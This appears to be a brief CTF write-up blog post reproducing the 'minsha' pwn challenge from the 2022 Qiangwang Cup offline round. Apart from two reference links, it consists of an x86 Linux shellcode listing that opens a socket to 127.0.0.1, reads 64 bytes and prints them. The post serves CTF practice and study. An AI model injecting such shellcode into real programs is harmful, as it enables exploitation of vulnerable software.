---
title: 2022 强网杯 线下赛 复现
date: 2023-09-26 07:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=72/
pin: false
published:
---



## minsha

https://cloud.tencent.com/developer/article/2105254

https://blog.csdn.net/m0_37947204/article/details/80489431

```assembly
global _start
_start:

        ;// socket(AF_INET,SOCK_STREAM,IPPROTO_IP)
        xor ebx,ebx
        mul ebx
        inc ebx ; //socket
        push edx
        push ebx
        push 0x2
        mov ecx,esp
        mov al,0x66
        int 0x80

        ;// connet(socket,(struct sockaddr *)&serv_addr,sizeof(struct sockaddr_in))
        push 0x100007f
        push 0xcdea0002
        mov ecx,esp
        push 0x10
        push ecx
        push eax
        mov bl,3
        mov ecx,esp
        mov al,0x66
        int 0x80

        ;//read(socket,esp,64)
        pop ebx
        mov ecx, esp
        mov dl, 64
        mov al,3
        int 0x80

        ;//write(1, esp, 64)
        xor ebx, ebx
        mov bl, 1
        mov al, 4
        int 0x80

        xor ebx,ebx
        mov al,1
        int 0x80
```



